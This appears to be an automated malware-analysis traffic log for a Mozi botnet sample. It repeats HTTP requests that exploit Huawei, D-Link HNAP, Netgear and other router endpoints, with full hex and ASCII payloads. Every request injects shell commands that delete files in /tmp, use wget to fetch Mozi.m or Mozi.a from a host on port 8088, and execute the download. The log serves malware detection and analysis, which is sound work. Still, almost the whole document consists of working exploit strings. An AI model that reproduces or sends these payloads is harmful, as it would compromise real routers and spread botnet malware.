                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 149.241.161.180:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 203.2.27.219:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 13.9.189.7:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 83.96.191.136:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 148.225.57.169:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 141.80.218.97:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 62.217.115.182:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 89.213.177.170:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
